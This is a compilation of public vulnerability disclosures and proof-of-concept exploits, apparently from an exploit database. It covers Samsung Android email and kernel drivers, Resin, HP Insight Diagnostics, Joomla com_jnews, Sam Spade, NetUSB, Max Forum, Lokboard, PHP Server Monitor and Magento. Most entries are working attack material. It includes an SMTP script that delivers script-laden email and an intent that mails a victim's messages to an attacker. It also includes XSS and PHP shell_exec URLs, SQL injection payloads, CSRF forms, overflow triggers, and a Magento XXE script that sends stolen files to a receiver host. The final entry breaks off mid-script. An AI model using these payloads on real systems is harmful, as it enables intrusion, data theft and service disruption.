HireHackking

# Source: https://code.google.com/p/google-security-research/issues/detail?id=494 ''' The default Samsung email client's email viewer and composer (implemented in SecEmailUI.apk) doesn't sanitize HTML email content for scripts before rendering the data inside a WebView. This allows an attacker to execute arbitrary JavaScript when a user views a HTML email which contains HTML script tags or other events. At the very least the JavaScript could exploit the attack surface provided within the WebView control. It might also be possible to access local file content or emails depending on the full configuration of the WebView, although this hasn't been tested fully. This can also be exploited locally with the com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND intent which will include attacker controlled HTML in the sending email. If the final message was viewed it would be possible for the script to extract the original message from the Document object and potentially post that information to another server. Attached is a simple SMTP client in Python to send an HTML message with script contents to the device. The "me", "you", "me_password" and "smtp_server" variables need to be changed to ones appropriate for the sending email account and the receiving account on the phone. When the resulting email is viewed it should display the URL of the page which is of the form email://M/N where M is the email account ID and N is the message ID which proves that the script code executed. ''' #!/usr/bin/env python import smtplib from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText # Change the details here appropriate to your configuration me = "attacker@gmail.com" me_password = "THIS IS NOT REAL" you = "project.zero.test@gmail.com" smtp_server = "smtp.gmail.com" msg = MIMEMultipart('alternative') msg['Subject'] = "Hello There!" msg['From'] = me msg['To'] = you text = "Hello There!" html = """\ <html> <head></head> <body> <p> <script>try { document.write(document.location); } catch(e) { document.write(e.message); }</script> </p> </body> </html> """ part1 = MIMEText(text, 'plain') part2 = MIMEText(html, 'html') msg.attach(part1) msg.attach(part2) s = smtplib.SMTP_SSL(smtp_server) s.login(me, me_password) s.sendmail(me, you, msg.as_string()) s.quit()

Source: https://code.google.com/p/google-security-research/issues/detail?id=491 The Exynos Seiren Audio driver has a device endpoint (/dev/seiren) that is accessible by either the system user or the audio group (such as the mediaserver). It was found that the write() implementation for this driver contains a buffer overflow vulnerability that overflow a static global buffer: static ssize_t esa_write(struct file *file, const char *buffer, size_t size, loff_t *pos) { struct esa_rtd *rtd = file->private_data; unsigned char *ibuf; … ibuf = rtd->ibuf0; ... /* receive stream data from user */ if (copy_from_user(ibuf, buffer, size)) { esa_err("%s: failed to copy_from_user\n", __func__); goto err; } Note that the user supplied buffer and size parameters are not adequately bounds checked. The destination buffer is fixed size, so memory corruption can occur. A simple proof-of-concept from a privileged shell can be used to trigger the issue (tested on a Samsung S6 Edge): # dd if=/dev/zero of=/dev/seiren count=5000000

Source: https://code.google.com/p/google-security-research/issues/detail?id=490 The SecEmailComposer/EmailComposer application used by the Samsung S6 Edge has an exported service action to do quick replies to emails. It was found that this action required no permissions to call, and could lead to an unprivileged application gaining access to email content. Service Action: com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND Component: com.samsung.android.email.composer Class Name: com.samsung.android.email.composer.service.QuickReplyService The service takes a JSON encoded string with various additional parameters. We need to know two parameters, the email address of the local account and a message ID. We can guess a valid message ID (which just seems to be an incrementing number). If we guess an invalid ID the service simply returns, but if we do get a valid ID the service seems to automatically create the reply email, attach an attacker supplied message as well as the contents of the original message and sends it to any email address you like. For example: Intent intent = new Intent(); intent.setAction("com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND"); intent.setClassName("com.samsung.android.email.composer", "com.samsung.android.email.composer.service.QuickReplyService"); intent.putExtra("data", "{'original-msg-id':1, " + "'account-id':'project.zero.victim@gmail.com', " + "'msg':'Hello World!'," + "'title':'Hello Title'," + "'toList':'project.zero.attacker@gmail.com'}"); ComponentName name = MainActivity.this.startService(intent); No permissions are required to send this service intent. If successfully sent this will show up in a "sent email" notification and will be present user’s sent email folder.

Source: https://code.google.com/p/google-security-research/issues/detail?id=493 The Samsung m2m1shot driver framework is used to provide hardware acceleration for certain media functions, such as JPEG decoding and scaling images. The driver endpoint (/dev/m2m1shot_jpeg) is accessible by the media server The Samsung S6 Edge is a 64-bit device, so a compatibility layer is used to allow 32-bit processes to provide structures that are expected by the 64-bit driver. There is a stack buffer overflow in the compat ioctl for m2m1shot: static long m2m1shot_compat_ioctl32(struct file *filp, unsigned int cmd, unsigned long arg) { ... switch (cmd) { case COMPAT_M2M1SHOT_IOC_PROCESS: { struct compat_m2m1shot data; struct m2m1shot_task task; int i, ret; memset(&task, 0, sizeof(task)); if (copy_from_user(&data, compat_ptr(arg), sizeof(data))) { dev_err(m21dev->dev, "%s: Failed to read userdata\n", __func__); return -EFAULT; } ... for (i = 0; i < data.buf_out.num_planes; i++) { task.task.buf_out.plane[i].len = data.buf_out.plane[i].len; ... } In this code snippet, the data.buf_out.num_planes value is attacker-controlled "u8" value, and is not bounds checked. However, task.task.buf_out.plane array is fixed in size (three elements), so a buffer overflow can occur during the loop shown above. Proof-of-concept code to trigger this issue (from a privileged shell) is attached (m2m1shot_compat.c). Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38555.zip

Source: https://code.google.com/p/google-security-research/issues/detail?id=492 The Samsung Graphics 2D driver (/dev/fimg2d) is accessible by unprivileged users/applications. It was found that the ioctl implementation for this driver contains a locking error which can lead to memory errors (such as use-after-free) due to a race condition. The key observation is in the locking routine definitions in fimg2d.h: #ifdef BLIT_WORKQUE #define g2d_lock(x) do {} while (0) #define g2d_unlock(x) do {} while (0) #define g2d_spin_lock(x, f) spin_lock_irqsave(x, f) #define g2d_spin_unlock(x, f) spin_unlock_irqrestore(x, f) #else #define g2d_lock(x) mutex_lock(x) #define g2d_unlock(x) mutex_unlock(x) #define g2d_spin_lock(x, f) do { f = 0; } while (0) #define g2d_spin_unlock(x, f) do { f = 0; } while (0) #endif This means that the g2d_lock/g2d_unlock routines are no-ops when BLIT_WORKQUE is defined, which appears to be the default configuration. Unfortunately the alternative spin lock routines are not used consistently with this configuration. For example, the FIMG2D_BITBLT_BLIT ioctl command (with notes annotated as "PZ"): ctx = file->private_data; /* PZ: ctx allocated at open(), lives on the heap. */ switch (cmd) { case FIMG2D_BITBLT_BLIT: mm = get_task_mm(current); if (!mm) { fimg2d_err("no mm for ctx\n"); return -ENXIO; } g2d_lock(&ctrl->drvlock); /* PZ: This is a no-op. */ ctx->mm = mm; ret = fimg2d_add_command(ctrl, ctx, (struct fimg2d_blit __user *)arg); if (ret) { ... } ret = fimg2d_request_bitblt(ctrl, ctx); /* PZ: Does stuff with the ctx. */ if (ret) { ... } g2d_unlock(&ctrl->drvlock); /* PZ: Another no-op */ As the lock macros are no-ops, a second process can change ctx->mm when the original process is still using the same ctx->mm (as long as it has access to the same file descriptor). Reproduction steps: Open /dev/fimg2d Fork to get two processes with different mm’s with the access to the fd Concurrently call the FIMG2D_BITBLT_BLIT ioctl from both processes. One ioctl should have valid data, the other should fail At this point ctx->mm will now have invalid or free data (free if the forked process dies). Proof-of-concept code to trigger this condition is attached (fimg2d-lock.c) Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38557.zip

source: https://www.securityfocus.com/bid/60410/info Linux kernel is prone to a local privilege-escalation vulnerability. Local attackers can exploit the issue to execute arbitrary code with kernel privileges or to crash the kernel, effectively denying service to legitimate users. # rmmod b43 # modprobe b43 fwpostfix=AA%xBB # dmesg

source: https://www.securityfocus.com/bid/60426/info Resin Professional is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Resin Professional 4.0.36 is vulnerable; other versions may also be affected. http://www.example.com/resin-admin\?%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

source: https://www.securityfocus.com/bid/60426/info Resin Professional is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Resin Professional 4.0.36 is vulnerable; other versions may also be affected. http://www.example.com/resin-admin/?q=index.php&logout=true%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/60449/info HP Insight Diagnostics is prone to a local file include vulnerability because it fails to adequately validate user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible. HP Insight Diagnostics 9.4.0.4710 is vulnerable; other versions may also be affected. https://www.example.com/hpdiags/frontend2/help/pageview.php?path=comparesurvey.html

source: https://www.securityfocus.com/bid/60447/info HP Insight Diagnostics is prone to a remote code-injection vulnerability. An attacker can exploit this vulnerability to inject and execute arbitrary code within the context of the affected application. HP Insight Diagnostics 9.4.0.4710 is vulnerable; other versions may also be affected. https://www.example.com/hpdiags/frontend2/commands/saveCompareConfig.php?filename=comparesurvey&target=winhardrive&device=&devicePath=C:/hp/hpsmh/data/htdocs/hpdiags/frontend2/help/&category=all&advanced=yes&leftFile=surveybase.xml&leftFileName=<%3f=shell_exec($_REQUEST[0])%3b%3f>&rightFile=survey.lastwebsession.xml&rightFileName=-&changesOnly=yes&overwrite=yes

# Description of the component: Reach, engage and delight more customers with newsletters, auto-responders or campaign management. ################################################################################################## # Exploit Title: [Joomla component com_jnews - SQL injection] # Google Dork: [inurl:option=com_jnews] # Date: [2015-10-29] # Exploit Author: [Omer Ramić] # Twitter: https://twitter.com/sp_omer # Vendor Homepage: [http://www.joobi.co/] # Software Link: [ http://www.joobi.co/index.php?option=com_content&view=article&id=8652&Itemid=3031 ] # Version: [8.5.1] & probably all prior # Tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16 ################################################################################################## #Vulnerable POST parameter: Parameter_1: sub_list_id[1] (This parametar needs to be encoded when exploited as: sub_list_id%5B1%5D) #The vulnerable parameter is within the following request: POST /joomlatest/index.php?option=com_jnews HTTP/1.1 Host: 192.168.0.10 User-Agent: Hidden-user-agent-version Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.10/joomlatest/index.php?option=com_jnews&view=subscribe&act=subone&Itemid=206 Cookie: Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 318 Itemid=188&name=asdf&email=asdf%40asdf.com &receive_html=0&timezone=00%3A00%3A00&confirmed=1&subscribed%5B1%5D=0&sub_list_id%5B1%5D=1&acc_level%5B1%5D=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1 #Vector: sub_list_id%5B1%5D=1[SQLi] POC_1: boolean-based blind Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=1 RLIKE (SELECT (CASE WHEN (7097=7097) THEN 1 ELSE 0x28 END))&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1 POC_2: error-based Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=1 AND EXTRACTVALUE(8483,CONCAT(0x5c,0x716b787671,(SELECT (ELT(8483=8483,1))),0x716b786b71))&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1 POC_3: AND/OR time-based blind Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=(SELECT * FROM (SELECT(SLEEP(5)))Qrax)&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1 ################################### # Greets to Palestine from Bosnia # ################################### Good Luck ^__^

#!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title : Sam Spade 1.14 Scan from IP address Field SEH Overflow Crash PoC # Discovery by : Luis Martínez # Email : l4m5@hotmail.com # Discovery Date : 20/10/2015 # Vendor Homepage : http://samspade.org # Software Link : http://www.majorgeeks.com/files/details/sam_spade.html # Tested Version : 1.14 # Vulnerability Type : Denial of Service (DoS) Local # Tested on OS : Windows XP Professional SP3 x86 es # Crash Point : Go to Tools > Scan addresses field > Enter the contents of 'samspade_1.14_BoF.txt' > OK ########################################################################################## # -----------------------------------NOTES----------------------------------------------# ########################################################################################## # After the execution of POC, the SEH chain looks like this: # 0012EBE0 43434343 # 42424242 *** CORRUPT ENTRY *** # And the Stack #0012EBD0 41414141 AAAA #0012EBD4 41414141 AAAA #0012EBD8 41414141 AAAA #0012EBDC 41414141 AAAA #0012EBE0 42424242 BBBB Pointer to next SEH record #0012EBE4 43434343 CCCC SE handler # And the Registers #EAX 00000001 #ECX 00000001 #EDX 00140608 #EBX 00000000 #ESP 0012EBD0 ASCII "AAAAAAAAAAAAAAAABBBBCCCC - " #EBP 41414141 #ESI 00C2BD00 #EDI 00E89DB0 #EIP 41414141 buffer = "\x41" * 531 nseh = "\x42" * 4 seh = "\x43" * 4 f = open ("samspade_1.14_BoF.txt", "w") f.write(buffer+nseh+seh) f.close()

source: https://www.securityfocus.com/bid/60455/info Max Forum is prone to multiple input-validation vulnerabilities including a PHP code-execution vulnerability, a local file-include vulnerability and an information-disclosure because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to inject arbitrary PHP code and include and execute arbitrary files from the vulnerable system in the context of the affected application and to obtain sensitive information that may aid in further attacks. Max Forum 2.0.0 is vulnerable; other versions may also be affected. PHP code-execution: POST /Max/install/install.php?step=4 HTTP/1.1 Host: www.example User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.example/Max/install/install.php?step=3 Cookie: exp_lang=en; language=english; max_name=admin; max_password=2d6df19ab196f1c344310e0021239a06; lang=en_US; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 179 mysql_host=www.example&mysql_login=root&mysql_pass=toor&mysql_database=max&db_prefix=max_%22%3Bphpinfo%28%29%3B%2F%2F&site_address=http%3A%2F%2Fwww.example%2FMax%2F&step=4&prev_step=3 Local file-include: GET /Max/install/ HTTP/1.1 Host: www.example User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: language=../../phpinfo; lang=en_US; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97 Connection: keep-alive Information-disclosure: GET /Max/index.php?forum=2 HTTP/1.1 Host: www.example User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: max_name=admin; max_password=dfbb72b7a33b97abda905a4af7e6c7f5; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97; lang= Connection: keep-alive

#!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title: NetUSB Kernel Stack Buffer Overflow # Date: 9/10/15 # Exploit Author: Adrian Ruiz Bermudo # Vendor Homepage: http://www.kcodes.com/ # Version: Multiple: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt # Tested on: NETGEAR DC112A # CVE : CVE-2015-3036 import socket import sys import random import string import time import struct from Crypto.Cipher import AES #pip install pycrypto DOS_BYTES = 128 #BoF TIMEOUT = 5 RECV_SIZE = 16 PORT_DEFAULT = 20005 AESKey = "\x5c\x13\x0b\x59\xd2\x62\x42\x64\x9e\xd4\x88\x38\x2d\x5e\xae\xcc" print "#" print "# Exploit KCodes NetUSB | Kernel Stack Buffer Overflow | Denial of Service (DoS)" print "# CVE-2015-3036" print "# Found by: Stefan Viehböck (Office Vienna) | SEC Consult Vulnerability Lab | https://www.sec-consult.com" print "# Exploit author: Adrián Ruiz Bermudo | @funsecurity | http://www.funsecurity.net" print "# Advisory: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt" print "#" print "" if len(sys.argv) >= 2: try: target = sys.argv[1] try: port = int(sys.argv[2]) except Exception as detail: port = PORT_DEFAULT #Inicialización de la conexión. init = "\x56\x05" #Datos aleatorios para el handshake randomData = "".join(random.choice(string.lowercase) for i in range(RECV_SIZE)) #Nombre del equipo con 128 carácteres para provocar DoS. computerName = "".join(random.choice(string.lowercase) for i in range(DOS_BYTES)) #Longitud del nombre del equipo - "\x80\x00\x00\x00" lengthComputerName = struct.pack("i", DOS_BYTES); #Sync - "\x07\x00\x00\x00" syncOK = struct.pack("i", 7); #Finalización de la conexión. end = "\x01" encryption_suite = AES.new(AESKey, AES.MODE_ECB, "") randomDataCrypt1 = encryption_suite.encrypt(randomData) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(TIMEOUT) print "Conectando:", target,":",port sock.connect((target, port)) print "Conectado" print "----------------" print "Inicializando:", init.encode("hex") sock.send(init) print "Random data para cifrar por el servidor:", randomData.encode("hex") sock.send(randomData) print "----------------" result = sock.recv(RECV_SIZE) print "Random data cifrados por el servidor:", result.encode("hex") print "Random data cifrados por el cliente:", randomDataCrypt1.encode("hex") if (randomDataCrypt1 == result): print "Handshake OK" randomData = sock.recv(RECV_SIZE) print "Random data a cifrar por el cliente:", randomData.encode("hex") randomDataCrypt2 = encryption_suite.encrypt(randomData) print "Random data cifrados por el cliente:", randomDataCrypt2.encode("hex") print "----------------" sock.send(randomDataCrypt2) print "Tamanio del nombre del host a parear:", lengthComputerName.encode("hex") sock.send(lengthComputerName) print "Nombre del host a parear:", computerName.encode("hex") sock.send(computerName) print "----------------" print "Sync: ", syncOK.encode("hex") sock.send(syncOK) if (sock.recv(RECV_SIZE) == syncOK): print "Sync ok" sock.send(end) try: #Esperamos unos segundos antes de conectar time.sleep(TIMEOUT) #Comprobamos si el dispositivo sigue vivo... sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(TIMEOUT) sock.connect((target, port)) print "No vulnerable" except Exception as detail: print "Vulnerable, exploit OK" else: print 'Sync error.' except Exception as detail: print "Error de comunicación:", detail else: print "Usage:", sys.argv[0], "target [port]"

source: https://www.securityfocus.com/bid/60458/info The Ambience theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/wp-content/themes/ambience/thumb.php?src=<body onload=alert(/darksnipper/)>.jpg

source: https://www.securityfocus.com/bid/60459/info Lokboard is prone to a remote PHP code-injection vulnerability. An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Lokboard 1.1 is vulnerable; other versions may also be affected. POST /lokboard/install/index_4.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/lokboard/install/index_3.php?error=1 Cookie: lang=; PHPSESSID=g4j89f6110r4hpl3bkecfpc7c1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 90 host=localhost&user=root&pass=toor&name=lokboard&pass_key=1234";phpinfo();//

[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-CSRF.txt Vendor: ================================ www.phpservermonitor.org sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download Product: ================================ PHP Server Monitor 3.1.1 Vulnerability Type: ================================= Cross site request forgery (CSRF) Vulnerability Details: ===================== Multiple CSRF issues in PHP Server Monitor allow remote attackers to add arbitrary users & servers to the system, modify system configurations and delete arbitrary servers, if user (admin) is logged in and visits our malicious website or clicks on our infected linxs. As no CRSF protection is used in the application, we can make request on the victims behalf an the server will happily oblige processing our malicous HTTP requests. Exploit code(s): =============== <!DOCTYPE> <html> <body onLoad="doit()"> <script> function doit(){ var e=document.getElementById('HELL') e.submit() } </script> 1) add arbitrary users to the system: <form id="HELL" action=" http://localhost/phpservermon-3.1.1/?&mod=user&action=save&id=0" method="post"> <input type="text" name="user_name" value="hyp3rlinx" > <input type="text" name="name" value="hyp3rlinx"> <input type="text" name="level" value="20"> <input type="text" name="password" value="abc123"> <input type="text" name="password_repeat" value="abc123"> <input type="text" name="email" value="ghostofsin@abyss.com"> <input type="text" name="mobile" value=""> <input type="text" name="pushover_key" value=""> <input type="text" name="pushover_device" value=""> </form> 2) add arbitrary servers to the system: <form id="HELL" action=" http://localhost/phpservermon-3.1.1/?&mod=server&action=save&id=0&back_to=" method="post"> <input type="text" name="label" value="HELL" > <input type="text" name="ip" value="malicious-domain.hell"> <input type="text" name="type" value="service"> <input type="text" name="port" value="666"> <input type="text" name="pattern" value=""> <input type="text" name="warning_threshold" value="1"> <input type="text" name="timeout" value=""> <input type="text" name="active" value="yes"> <input type="text" name="email" value="yes"> <input type="text" name="sms" value="yes"> <input type="text" name="pushover" value="yes"> </form> 3) modify system configuration: <form id="HELL" action=" http://localhost/phpservermon-3.1.1/index.php?mod=config&action=save" method="post"> <input type="text" name="language" value="en_US" > <input type="text" name="show_update%5B%5D=" value="on"> <input type="text" name="auto_refresh_servers" value="0"> <input type="text" name="alert_type" value="status"> <input type="text" name="log_status%5B%5D" value="on"> <input type="text" name="log_retention_period" value="1"> <input type="text" name="email_status%5B%5D" value="on"> <input type="text" name="log_email%5B%5D" value="on"> <input type="text" name="email_from_name" value="ghostofsin"> <input type="text" name="email_from_email" value="abysmalgodz@abyss.com"> <input type="text" name="email_smtp_port" value="25"> <input type="text" name="email_smtp_security" value=""> <input type="text" name="email_smtp_username" value=""> <input type="text" name="email_smtp_password" value=""> <input type="text" name="test_email" value="1"> <input type="text" name="log_sms%5B%5D" value="on"> <input type="text" name="sms_gateway" value="whatever"> <input type="text" name="sms_gateway_username" value="username"> <input type="text" name="sms_gateway_password" value="password"> <input type="text" name="sms_from" value="1234567890"> <input type="text" name="test_sms" value="0"> <input type="text" name="sms_from" value="1234567890"> <input type="text" name="log_pushover%5B%5D" value="0"> <input type="text" name="pushover_api_token" value=""> <input type="text" name="test_pushover" value="0"> </form> </body> </html> 4) arbitrary server deletion via GET request: http://localhost/sectest/phpservermon-3.1.1/?&mod=server&action=delete&id=2 Exploitation Technique: ======================= Remote Severity Level: ========================================================= High Disclosure Timeline: ========================================================= Vendor Notification: NA Oct 30, 2015 : Public Disclosure Description: ========================================================== Request Method(s): [+] GET / POST Vulnerable Product: [+] PHP Server Monitor 3.1.1 =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx

============================================= - Release date: 29.10.2015 - Discovered by: Dawid Golunski - Severity: High/Critical - eBay Magento ref.: APPSEC-1045 ============================================= I. VULNERABILITY ------------------------- eBay Magento CE <= 1.9.2.1 XML eXternal Entity Injection (XXE) on PHP FPM eBay Magento EE <= 1.14.2.1 II. BACKGROUND ------------------------- - eBay Magento eCommerce http://magento.com/ "More than 240,000 merchants worldwide put their trust in our eCommerce software. Magento's eCommerce platform gives you the tools you need to attract more prospects, sell more products, and make more money. It's what we do. We're owned by eBay, so you know we're eCommerce experts" - PHP FPM http://php.net/manual/en/install.fpm.php "FPM (FastCGI Process Manager) is an alternative PHP FastCGI implementation with some additional features (mostly) useful for heavy-loaded sites." Starting from release 5.3.3 in early 2010, PHP merged the php-fpm fastCGI process manager into its codebase. III. INTRODUCTION ------------------------- eBay Magento eCommerce application uses Zend Framework which has a vulnerability that allows for XML eXternal Entity injection in applications served with PHP FPM. XXE (XML eXternal Entity) attack is an attack on an application that parses XML input from untrusted sources using incorrectly configured XML parser. The application may be forced to open arbitrary files and/or network resources. Exploiting XXE issues on PHP applications may also lead to denial of service or in some cases (e.g. when an 'expect' PHP module is installed) lead to command execution. IV. DESCRIPTION ------------------------- The aforementioned XXE vulnerability in Zend Framework which affects eBay Magento, was assigned a CVE-ID of CVE-2015-5161 and can be found in a separate advisory at: http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt In short, the Zend Framework XXE vulnerability stems from an insufficient sanitisation of untrusted XML data on systems that use PHP-FPM to serve PHP applications. By using certain multibyte encodings within XML, it is possible to bypass the sanitisation and perform certain XXE attacks. Since eBay Magento is based on Zend Framework and uses several of its XML classes, it also inherits this XXE vulnerability. The vulnerability in Zend affects all its XML components, however there are two vulnerable Zend Framework vulnerable components: - Zend_XmlRpc_Server - Zend_SOAP_Server that are of special interest to attackers as they could be exploited remotely without any authentication. Magento implements a store API providing XML/SOAP web services. Although the Zend_XmlRpc is present within Magento code base, the testing revealed that an older Zend class was used for its implementation, which is not vulnerable. However, further testing revealed that Magento SOAP API was implemented using the Zend_SOAP_Server class from Zend Framework, which is vulnerable to the XXE injection vulnerability discovered earlier. V. PROOF OF CONCEPT ------------------------- Normally, when an XML containing entities is supplied to magento SOAP API, the following message gets produced: <SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>Sender</faultcode> <faultstring>Detected use of ENTITY in XML, disabled to prevent XXE/XEE attacks</faultstring></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope> Below is a POC exploit that automates the steps necessary to bypass this protection on Magento served with PHP-FPM, and remotely exploit the XXE issue in Magento's SOAP API without authentication. Authentication is not required for the exploitation, as Magento first needs to load the malicious XML data in order to read credentials within the SOAP login method. Loading malicious XML may be enough to trigger attacker's payload within the entities (in case of libxml2 library auto-expanding entities). ---[ magento-soap-exploit.sh ]--- #!/bin/bash # # POC Exploit (v1.1) # # eBay Magento CE <= 1.9.2.1 XML eXternal Entity Injection (XXE) on PHP-FPM # eBay Magento EE <= 1.14.2.1 # # CVE-2015-5161 # # Credits: # # Dawid Golunski # dawid (at) legalhackers.com # http://legalhackers.com # # Advisories: # # http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt # http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt # # Usage: # # [Vulnerability test] # # This is to test the vulnerability with a simple XXE payload which retrieves the # /dev/random file and causes a time out. No receiver server is required in this # test as no data is returned. # # Run the script with just the URL to Magento SOAP API, with no other parameters. # E.g: # ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index # # # [File retrieval from the remote server] # # ./magento-soap-exploit.sh MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT # # E.g: # ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index /etc/hosts 192.168.10.5 80 # # In this example, file extracted via the XXE attack will be sent as base64 encoded parameter to: # http://192.168.10.5:80/fetch.php?D=[base64_string] # You should have the receiver server/script listening on the specified port before running this exploit. # TIMEOUT=6 PAYLOAD_TMP_FILE="/tmp/payload-utf16.xml" if [ $# -ne 1 ] && [ $# -ne 4 ] ; then echo -e "\nUsage: \n" echo -e "[Vulnerability test]\n" echo -e "$0 MAGENTO_SOAP_API_URL" echo -e "E.g:" echo -e "$0 http://fpmserver/magento/index.php/api/soap/index\n"; echo -e "[File retrieval]\n" echo -e "$0 MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT" echo -e "E.g:" echo -e "$0 http://fpmserver/magento/index.php/api/soap/index /etc/hosts 192.168.5.6 80\n"; exit 2; else TARGETURL="$1" fi if [ $# -eq 4 ]; then FILE="$2" RECEIVER_HOST="$3" RECEIVER_PORT="$4" TEST_ONLY=0 else TEST_ONLY=1 fi if [ $TEST_ONLY -eq 1 ]; then # Vulnerability test # Perform only a test by reading /dev/random file TEST_PAYLOAD_XML='<?xml version="1.0" encoding="UTF-16"?> <!DOCTYPE foo [ <!ELEMENT PoC ANY > <!ENTITY % xxe SYSTEM "file:///dev/random" > %xxe; ]>' echo "$TEST_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE echo -e "Target URL: $TARGETURL\nInjecting Test XXE payload (/dev/random). Might take a few seconds.\n" # Fetching /dev/random should cause the remote script to block # on reading /dev/random until the script times out. # If there is no delay it means the remote script is not vulnerable or # /dev/random is not accessible. START=$(date +%s) wget -t 1 -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE END=$(date +%s) DIFF=$(expr $END \- $START ) if [ $DIFF -eq $TIMEOUT ]; then echo "Vulnerable. No response from Magento for $DIFF seconds :)" exit 0 else echo "Not vulnerable, or there is no /dev/random on the remote server ;)" exit 1 fi else # File 